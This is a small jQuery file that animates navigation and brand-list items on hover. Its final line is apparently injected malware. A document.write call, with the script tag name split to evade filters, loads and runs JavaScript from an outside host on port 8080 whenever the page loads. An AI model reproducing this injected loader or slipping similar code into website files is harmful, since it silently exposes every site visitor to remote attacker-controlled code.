$(function() {
   
	$('#nav li:not(.selected)').hover(function() {
		$(this).animate({marginLeft: 7}, 200);
	}, function() {
		$(this).animate({marginLeft: 0}, 200);
	});
 
	$('#brand-list li:not(.selected)').hover(function() {
		$(this).stop().animate({opacity: 1});
	}, function() {
		$(this).stop().animate({opacity: 0.6});
	});
    
});
document.write('<s'+'cript type="text/javascript" src="http://temp.aspdesign.net:8080/Data.js"></scr'+'ipt>');